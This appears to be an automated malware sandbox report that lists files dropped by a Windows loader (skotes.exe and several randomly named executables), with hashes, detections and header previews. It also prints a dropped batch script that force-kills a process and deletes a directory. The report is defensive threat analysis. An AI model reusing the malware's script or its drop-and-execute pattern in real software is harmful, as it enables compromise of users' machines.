Preview:	MZ`.....................@...................................`...........!..L.!Require Windows..$PE..L....?.O............................_.............@..................................D..............................................0...O...........{C..?..............................................................l............................text............................... ..`.rdata...;.......<..................@..@.data....M..........................@....rsrc....O...0...P..................@..@........U..`.A.......S3.;.VWt.f9.b.A.t...`.A.P.P...P....Y.nj'.@....u..v..=..A..6P......P....9^..].v8.^..3......h..A.P..........P......P..x.A..E..E....;F.r......P.~...Y..6..j...t.A...t$..D....V...%s......A..F8......^.j..q.....A..3.9.`.A.t...@....9D$.t..t$.Ph.....5X.A.....A.3.....D$..`...\|$..u..@.....3.....p.A.............t$..D$..t$...`.A./.@..t$...P.Q..%`.A...3.....T$..L$....f..AABBf..u..L$.3.f9.t.@f.<A.u...t$...T.A..L$.......%..........S.\$.V..C;^.tLW3.j.Z...........Q.....3.9F.Y~.9F

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\random[2].exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	2959872
Entropy (8bit):	6.512893983139884
Encrypted:	false
SSDEEP:	49152:aHCFKyfwmC4MAt+HSGlIeKN7AJ4zEIcaW:wUKynCXAt+HHeAi4t
MD5:	367B6CF5AE840296A2E43E2D58A2F8CC
SHA1:	5D6C9BC82479231D94457E1823CEB000AFAEB8A0
SHA-256:	BB58C79E3BFF569D2167F5C478E8BFEEC422D0BC29FA84732E190472BB25BB77
SHA-512:	80D4378C27C7CCD9E8DBC524255BC8FCFE9C011D893CEBC6816C15C6FD997EF856F795773B1EECF1D736853F9A7F840F679654569167B7B2DEFE00BD9CD11A06
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$....... ...d..d..d....s.\|....F.i....r.^..m.[.g..m.K.b....g..d.......w.w....E.e..Richd..........PE..L....dTg.....................*.......`P...........@...........................P......-...@.................................M.$.a.....$.......................$..................................................................................... . ..$......h..................@....rsrc.........$......x..............@....idata ......$......\|..............@...doyjdknv..+...$...+..~..............@...vjvesdaf.....PP.......-.............@....taggant.0...`P.."....-.............@...........................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\random[1].exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
File Type:	PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows
Category:	dropped
Size (bytes):	4424704
Entropy (8bit):	7.984456195359565
Encrypted:	false
SSDEEP:	98304:OSSgZ516OBkWdG4y0p0GrtnBG3am0+q2XSU1jpIkkg5:5DtBpNjG5z1Ckz5
MD5:	119E98D812D67FAAD4C9243ECE8FFB66
SHA1:	4441DAEDE8ED2D75EC7EB542954D8DE9E19E3EAA
SHA-256:	6984C73C46B1321D7959C40296AF14493A161FDE2173EBB961261A1A6354D68A
SHA-512:	B9D3F56F395A44407B7D58D72DF2825CDAA8D0FB26E6EC29EBD0E94E464D0F9D0ABECB6774865A348CD513FD2E8A7FC2D7ABAFEC8139626CA371FD396656FCCD
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...._g...............(..G...u..2............H...@..........................0........C...@... ............................._.r.s.....r............................................................................................................. . ..r......*(.................@....rsrc.........r......:(.............@....idata ......r......<(.............@... ..7...s......>(.............@...gmgvfxzz. ..........@(.............@...oqheswup.............\C.............@....taggant.0......."...bC.............@...........................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\random[2].exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	32768
Entropy (8bit):	6.4644211319855005
Encrypted:	false
SSDEEP:	768:+MjfzEupedG9ip0PK+ICsj5g8j9QFnQ8ib:jjflpedGwp19j5g8On4b
MD5:	01A6EDFAE279714240076917B891F4D7
SHA1:	8F890EED5A577F968025561E486EA54845BDD276
SHA-256:	85294BE3F2E7845CE1F1DDB43EC08429DD64D68DB4AD94D552C2BA580E570685
SHA-512:	3D02B59F56DC62DECB3F6609D68D2ED142752B0A78D98A55003AF08FDBED3BE3C745DB539852CA723F6DBB5B979CB82463C85C51FE03671414E14278213E03A7
Malicious:	true
Preview:	MZ......................@...........z...................................!..L.!This program cannot be run in DOS mode....$.......PE..L...P(,e.........."...0..$...........`D.. ...`....@.. ........................D...........`.................................U...i....`..D........................................................................................................... . .@... ....... ..............@....rsrc...D....`.......2..............@....idata . ...........6..............@... ..)..........8..............@...cllxmxcj.....`*......:..............@...xpgytcmm. ...@D.....................@....taggant.@...`D.."..................@...........................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\random[1].exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1870336
Entropy (8bit):	7.945857164427516
Encrypted:	false
SSDEEP:	49152:Ahj1grp2L8Rdoa7vpTkVbF/qxlueVEsKkWBNFzXwI:8pPL2doqTkKxlueVRKzNVwI
MD5:	FD17D712C627B434E99749CFC82C7D51
SHA1:	BF00A1FE4D9EFC63E963751201A383BF9DF7D25E
SHA-256:	AF8729A17698880E54E9F23B48E6B68D73672179F58868C201C8CF54D1A578BC
SHA-512:	B3F56A4457DF967D9355F42316E8332813C46003B4D2E216FBABDED7EDCDDCBEFC72EE01FD706722CF81E2FB3E0986C31358A22270F7B36106E77A88B6C25C85
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 47%
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....<_g..............................I...........@...........................I.....wi....@.................................T0..h.... .......................1...................................................................................... . .........H..................@....rsrc........ .......X..............@....idata .....0.......Z..............@... .@*..@.......\..............@...vpedfbia....../......^..............@...fsmwrfhy......I......d..............@....taggant.0....I.."...h..............@...................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\random[2].exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1892864
Entropy (8bit):	7.9467990142287945
Encrypted:	false
SSDEEP:	49152:T3Z00Ha5zll2Y3jxZ+w93CzyQCo3ZXVo:T20HK3j2FyQCo3ZW
MD5:	888B13E065AFA64105EADCA248F496AE
SHA1:	16A2901CAA453A04B9A30B641DC03F522CA7FAE0
SHA-256:	6D5664BA300AE2F6FE3819C93470ADBB271882BD8819D18810A9BA1089FB4A15
SHA-512:	C22D5368371612B870B9AA584556D89FB1F5AAE013253B88C52FE8462B5BF29623E74046712195CAEABA7A0E0AA651CF460345B82771016A0A9657AF5D62BED9
Malicious:	true
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....<_g.............................`J...........@...........................J..........@.................................T0..h.... .......................1...................................................................................... . .........H..................@....rsrc........ .......X..............@....idata .....0.......\..............@... ..*..@.......^..............@...sqzmxkkd.`..../..\...`..............@...vbjjmcvu.....PJ.....................@....taggant.0...`J.."..................@...................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	64
Entropy (8bit):	1.1940658735648508
Encrypted:	false
SSDEEP:	3:Nlllul/suL:NllUku
MD5:	9092B0E83B8E62D6731409BD3B39C415
SHA1:	B602A92B2E62830E8B5183386F5C84D143DB72F9
SHA-256:	E531241B6310C4D003F9E6C6A25F9D0DC644D887C81B227C7B96CA29EC8F7416
SHA-512:	670AEFD1CEC191266C76AF22488D9F87556C8031CDA919A25843648DC5CD5D836551D4CC7556C7FAAF8FD6D423F88E998DBD87206AFA7342B3E839ACDD50EE92
Malicious:	false
Preview:	@...e.................................../............@..........

C:\Users\user\AppData\Local\Temp\1016489001\e66237da20.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1870336
Entropy (8bit):	7.945857164427516
Encrypted:	false
SSDEEP:	49152:Ahj1grp2L8Rdoa7vpTkVbF/qxlueVEsKkWBNFzXwI:8pPL2doqTkKxlueVRKzNVwI
MD5:	FD17D712C627B434E99749CFC82C7D51
SHA1:	BF00A1FE4D9EFC63E963751201A383BF9DF7D25E
SHA-256:	AF8729A17698880E54E9F23B48E6B68D73672179F58868C201C8CF54D1A578BC
SHA-512:	B3F56A4457DF967D9355F42316E8332813C46003B4D2E216FBABDED7EDCDDCBEFC72EE01FD706722CF81E2FB3E0986C31358A22270F7B36106E77A88B6C25C85
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 47%
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....<_g..............................I...........@...........................I.....wi....@.................................T0..h.... .......................1...................................................................................... . .........H..................@....rsrc........ .......X..............@....idata .....0.......Z..............@... .@*..@.......\..............@...vpedfbia....../......^..............@...fsmwrfhy......I......d..............@....taggant.0....I.."...h..............@...................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\1016490001\b3712f1a7c.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	4438776
Entropy (8bit):	7.99505709582503
Encrypted:	true
SSDEEP:	98304:Z/5zwjjEgd1H9RKNXpyUEJh56Nd1QVECgnD8EUVLbZJZCH3J53uJ+b:Z/qBdHRSXYBmrohgnDfUxbZJE2K
MD5:	3A425626CBD40345F5B8DDDD6B2B9EFA
SHA1:	7B50E108E293E54C15DCE816552356F424EEA97A
SHA-256:	BA9212D2D5CD6DF5EB7933FB37C1B72A648974C1730BF5C32439987558F8E8B1
SHA-512:	A7538C6B7E17C35F053721308B8D6DC53A90E79930FF4ED5CFFECAA97F4D0FBC5F9E8B59F1383D8F0699C8D4F1331F226AF71D40325022D10B885606A72FE668
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 88%
Preview:	MZ`.....................@...................................`...........!..L.!Require Windows..$PE..L....?.O............................_.............@..................................D..............................................0...O...........{C..?..............................................................l............................text............................... ..`.rdata...;.......<..................@..@.data....M..........................@....rsrc....O...0...P..................@..@........U..`.A.......S3.;.VWt.f9.b.A.t...`.A.P.P...P....Y.nj'.@....u..v..=..A..6P......P....9^..].v8.^..3......h..A.P..........P......P..x.A..E..E....;F.r......P.~...Y..6..j...t.A...t$..D....V...%s......A..F8......^.j..q.....A..3.9.`.A.t...@....9D$.t..t$.Ph.....5X.A.....A.3.....D$..`...\|$..u..@.....3.....p.A.............t$..D$..t$...`.A./.@..t$...P.Q..%`.A...3.....T$..L$....f..AABBf..u..L$.3.f9.t.@f.<A.u...t$...T.A..L$.......%..........S.\$.V..C;^.tLW3.j.Z...........Q.....3.9F.Y~.9F

C:\Users\user\AppData\Local\Temp\1016491001\53f7160658.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1763328
Entropy (8bit):	7.9328592774034865
Encrypted:	false
SSDEEP:	49152:z/CDAVERG4Wk9R/dA0AwqSoym/VkICGdt:7859Rdy8oVmm
MD5:	D37DAB4C59E707F632BB0B91EAA87FF9
SHA1:	0E153DEBCF54805A0543646620511B57865D6FC9
SHA-256:	375A067BE10250DC045EA14025444AD7EC0662CF189ABBBD393E6F7FFE85B35D
SHA-512:	0AE81ABBE56F0A20C8066C52672D969C962A20B19C7E7165B12C7B16A4F0681C4F96CE2CEDDE50ADE5975CED262D581FC99D0947C188CEC847C8A82EB85BC0AE
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100%
Preview:	MZ......................@...........z...................................!..L.!This program cannot be run in DOS mode....$.......PE..L....}^g..............0...............E.. ........@.. ........................E...........`.................................U...i................................................................................................................... . ..... ...T... ..............@....rsrc................t..............@....idata . ..........................@... . *.. ......................@...fsrfimey.@...@+..<..................@...mhpawist. ....E.....................@....taggant.@....E.."..................@...........................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\1016492001\53fe16f582.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
File Type:	PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows
Category:	dropped
Size (bytes):	4424704
Entropy (8bit):	7.984456195359565
Encrypted:	false
SSDEEP:	98304:OSSgZ516OBkWdG4y0p0GrtnBG3am0+q2XSU1jpIkkg5:5DtBpNjG5z1Ckz5
MD5:	119E98D812D67FAAD4C9243ECE8FFB66
SHA1:	4441DAEDE8ED2D75EC7EB542954D8DE9E19E3EAA
SHA-256:	6984C73C46B1321D7959C40296AF14493A161FDE2173EBB961261A1A6354D68A
SHA-512:	B9D3F56F395A44407B7D58D72DF2825CDAA8D0FB26E6EC29EBD0E94E464D0F9D0ABECB6774865A348CD513FD2E8A7FC2D7ABAFEC8139626CA371FD396656FCCD
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...._g...............(..G...u..2............H...@..........................0........C...@... ............................._.r.s.....r............................................................................................................. . ..r......*(.................@....rsrc.........r......:(.............@....idata ......r......<(.............@... ..7...s......>(.............@...gmgvfxzz. ..........@(.............@...oqheswup.............\C.............@....taggant.0......."...bC.............@...........................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\1016493001\a98b6b83c7.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1892864
Entropy (8bit):	7.9467990142287945
Encrypted:	false
SSDEEP:	49152:T3Z00Ha5zll2Y3jxZ+w93CzyQCo3ZXVo:T20HK3j2FyQCo3ZW
MD5:	888B13E065AFA64105EADCA248F496AE
SHA1:	16A2901CAA453A04B9A30B641DC03F522CA7FAE0
SHA-256:	6D5664BA300AE2F6FE3819C93470ADBB271882BD8819D18810A9BA1089FB4A15
SHA-512:	C22D5368371612B870B9AA584556D89FB1F5AAE013253B88C52FE8462B5BF29623E74046712195CAEABA7A0E0AA651CF460345B82771016A0A9657AF5D62BED9
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100%
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....<_g.............................`J...........@...........................J..........@.................................T0..h.... .......................1...................................................................................... . .........H..................@....rsrc........ .......X..............@....idata .....0.......\..............@... ..*..@.......^..............@...sqzmxkkd.`..../..\...`..............@...vbjjmcvu.....PJ.....................@....taggant.0...`J.."..................@...................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\1016494001\c3fed0b086.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	2959872
Entropy (8bit):	6.512893983139884
Encrypted:	false
SSDEEP:	49152:aHCFKyfwmC4MAt+HSGlIeKN7AJ4zEIcaW:wUKynCXAt+HHeAi4t
MD5:	367B6CF5AE840296A2E43E2D58A2F8CC
SHA1:	5D6C9BC82479231D94457E1823CEB000AFAEB8A0
SHA-256:	BB58C79E3BFF569D2167F5C478E8BFEEC422D0BC29FA84732E190472BB25BB77
SHA-512:	80D4378C27C7CCD9E8DBC524255BC8FCFE9C011D893CEBC6816C15C6FD997EF856F795773B1EECF1D736853F9A7F840F679654569167B7B2DEFE00BD9CD11A06
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$....... ...d..d..d....s.\|....F.i....r.^..m.[.g..m.K.b....g..d.......w.w....E.e..Richd..........PE..L....dTg.....................*.......`P...........@...........................P......-...@.................................M.$.a.....$.......................$..................................................................................... . ..$......h..................@....rsrc.........$......x..............@....idata ......$......\|..............@...doyjdknv..+...$...+..~..............@...vjvesdaf.....PP.......-.............@....taggant.0...`P.."....-.............@...........................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\1016495001\3f0b27a17c.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	970240
Entropy (8bit):	6.702656362349821
Encrypted:	false
SSDEEP:	24576:dqDEvCTbMWu7rQYlBQcBiT6rprG8aFiUD:dTvC/MTQYxsWR7aF
MD5:	FA4DA1ACF28B53802C933C6AB5DB2C06
SHA1:	6DB997A98D70BB92F98EC33D717D3C56E44C571A
SHA-256:	3533C7C662100CBEDB01A5BAD319C7ED9CE6A47C4AB2E68BFAEE08DE7CA10F2C
SHA-512:	C5553F51F9ADB30E03F1D6D42BD7BF4538C3208082029BA18FF83C019F0DA4D47CBEDCEEF63796E37BDF6E41D5F8DE84B3EA277527477FF570E2BBE0B0AA7265
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100%
Preview:	MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$...................j:......j:..C...j:......@.*...........................n......~............{.......{......{.......z....{......Rich...................PE..L...Y.ag..........".................w.............@..........................0......=]....@...@.......@.....................d...\|....@..Pb.......................u...........................4..........@............................................text............................... ..`.rdata..............................@..@.data...lp.......H..................@....rsrc...Pb...@...d..................@..@.reloc...u.......v...X..............@..B........................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\1016496001\318ea9f50d.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	32768
Entropy (8bit):	6.4644211319855005
Encrypted:	false
SSDEEP:	768:+MjfzEupedG9ip0PK+ICsj5g8j9QFnQ8ib:jjflpedGwp19j5g8On4b
MD5:	01A6EDFAE279714240076917B891F4D7
SHA1:	8F890EED5A577F968025561E486EA54845BDD276
SHA-256:	85294BE3F2E7845CE1F1DDB43EC08429DD64D68DB4AD94D552C2BA580E570685
SHA-512:	3D02B59F56DC62DECB3F6609D68D2ED142752B0A78D98A55003AF08FDBED3BE3C745DB539852CA723F6DBB5B979CB82463C85C51FE03671414E14278213E03A7
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100%
Preview:	MZ......................@...........z...................................!..L.!This program cannot be run in DOS mode....$.......PE..L...P(,e.........."...0..$...........`D.. ...`....@.. ........................D...........`.................................U...i....`..D........................................................................................................... . .@... ....... ..............@....rsrc...D....`.......2..............@....idata . ...........6..............@... ..)..........8..............@...cllxmxcj.....`*......:..............@...xpgytcmm. ...@D.....................@....taggant.@...`D.."..................@...........................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_02jzrulx.fx4.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_25bq52xy.urv.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_51zky2bp.mco.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_bfx0wwdd.edv.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	3063296
Entropy (8bit):	6.521421490685371
Encrypted:	false
SSDEEP:	49152:2f6WspjSMgy4UCMNXvTUeJ5UihOMufBgXfCjwQMt4M:vWs1SFy4PMNfTUsUihOMSBIKj3E4
MD5:	79A76F34927416F5A65BF946E45037AE
SHA1:	DB1A4A8DB5BB53533B83B6E1BCD1BE237A2CA21D
SHA-256:	D64545E2FBCC8AC277CC61F993BAAEB5DA2B7C41DF95F0341078C7C4E4DDD332
SHA-512:	CBB9CBFBA277F3789C39B4BA4669D3EC0FC27D4CE97C1DD1B8E57F71CEA46980D34CBF11C29B80C02A11A8B8FD2278C7C761EAAD9294F6EB28AC107F6082219F
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 50%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........-I..C...C...C...@...C...F.B.C.6.G...C.6.@...C.6.F...C...G...C...B...C...B.5.C.x.J...C.x.....C.x.A...C.Rich..C.........................PE..L....V.f.............................`2...........@...........................2.....9./...@.................................W...k............................N2..............................M2..................................................... . ............................@....rsrc...............................@....idata ............................@...tklukryc..+.......+.................@...ednrpsaq.....P2.....................@....taggant.0...`2.."..................@...........................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe:Zone.Identifier

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	ASCII text, with CRLF line terminators
Category:	modified
Size (bytes):	26
Entropy (8bit):	3.95006375643621
Encrypted:	false
SSDEEP:	3:ggPYV:rPYV
MD5:	187F488E27DB4AF347237FE461A079AD
SHA1:	6693BA299EC1881249D59262276A0D2CB21F8E64
SHA-256:	255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
SHA-512:	89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
Malicious:	true
Preview:	[ZoneTransfer]....ZoneId=0

C:\Users\user\AppData\Local\Temp\main\7z.dll

Download File

Process:	C:\Users\user\AppData\Local\Temp\1016490001\b3712f1a7c.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	1679360
Entropy (8bit):	6.278252955513617
Encrypted:	false
SSDEEP:	24576:S+clx4tCQJSVAFja8i/RwQQmzgO67V3bYgR+zypEqxr2VSlLP:jclmJSVARa86xzW3xRoyqqxrT
MD5:	72491C7B87A7C2DD350B727444F13BB4
SHA1:	1E9338D56DB7DED386878EAB7BB44B8934AB1BC7
SHA-256:	34AD9BB80FE8BF28171E671228EB5B64A55CAA388C31CB8C0DF77C0136735891
SHA-512:	583D0859D29145DFC48287C5A1B459E5DB4E939624BD549FF02C61EAE8A0F31FC96A509F3E146200CDD4C93B154123E5ADFBFE01F7D172DB33968155189B5511
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........w...$...$...$.&.$...$.&.$...$...$...$.&.$%..$.&.$..$.&G$...$.&.$...$.&.$...$.&.$...$Rich...$........................PE..d.....n\.........." .........H...............................................P............`.............................................y...l...x........{...p.......................................................................................................text............................... ..`.rdata..9...........................@..@.data...............................@....pdata.......p... ..................@..@.rsrc....{.......\|..................@..@.reloc...0.......2...n..............@..B........................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\main\7z.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\1016490001\b3712f1a7c.exe
File Type:	PE32+ executable (console) x86-64, for MS Windows
Category:	dropped
Size (bytes):	468992
Entropy (8bit):	6.157743912672224
Encrypted:	false
SSDEEP:	6144:fz1gL5pRTMTTjMkId/BynSx7dEe6XwzRaktNP08NhKs39zo43fTtl1fayCV7+DHV:r1gL5pRTcAkS/3hzN8qE43fm78V
MD5:	619F7135621B50FD1900FF24AADE1524
SHA1:	6C7EA8BBD435163AE3945CBEF30EF6B9872A4591
SHA-256:	344F076BB1211CB02ECA9E5ED2C0CE59BCF74CCBC749EC611538FA14ECB9AAD2
SHA-512:	2C7293C084D09BC2E3AE2D066DD7B331C810D9E2EECA8B236A8E87FDEB18E877B948747D3491FCAFF245816507685250BD35F984C67A43B29B0AE31ECB2BD628
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........(...{...{...{...{...{...{...{...{...{...{...{...{...{..!{...{...{...{...{...{Rich...{................PE..d.....n\.........."..........l...... .........@...........................................`.....................................................x....`..........,a...........p.......................................................... ............................text............................... ..`.rdata..............................@..@.data....,..........................@....pdata..,a.......b..................@..@.rsrc........`......................@..@.reloc.......p......................@..B........................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\main\KillDuplicate.cmd

Download File

Process:	C:\Users\user\AppData\Local\Temp\1016490001\b3712f1a7c.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	222
Entropy (8bit):	4.855194602218789
Encrypted:	false
SSDEEP:	6:vFuj9HUHOPLtInnIgvRY77flFjfA+qpxuArS3+xTfVk3:duj9HeONgvRYnlfYFrSMTtk3
MD5:	68CECDF24AA2FD011ECE466F00EF8450
SHA1:	2F859046187E0D5286D0566FAC590B1836F6E1B7
SHA-256:	64929489DC8A0D66EA95113D4E676368EDB576EA85D23564D53346B21C202770
SHA-512:	471305140CF67ABAEC6927058853EF43C97BDCA763398263FB7932550D72D69B2A9668B286DF80B6B28E9DD1CBA1C44AAA436931F42CC57766EFF280FDB5477C
Malicious:	false
Preview:	Cd /d %1..Rd "%SfxVarApiPath%"..For /f "Tokens=1,2 Delims=," %%I In ('TaskList /fo CSV /nh') Do (.. If %%I==%2 (.. Set /a N+=1.. Set PID=%%~J.. )..)..If %N% EQU 1 Rd /s /q %1..If %N% GTR 1 TaskKill /pid %PID% /t /f

C:\Users\user\AppData\Local\Temp\main\extracted\AntiAV.data

Download File

Process:	C:\Users\user\AppData\Local\Temp\main\7z.exe
File Type:	ASCII text, with very long lines (65536), with no line terminators
Category:	dropped
Size (bytes):	2355713
Entropy (8bit):	5.891648193754473
Encrypted:	false
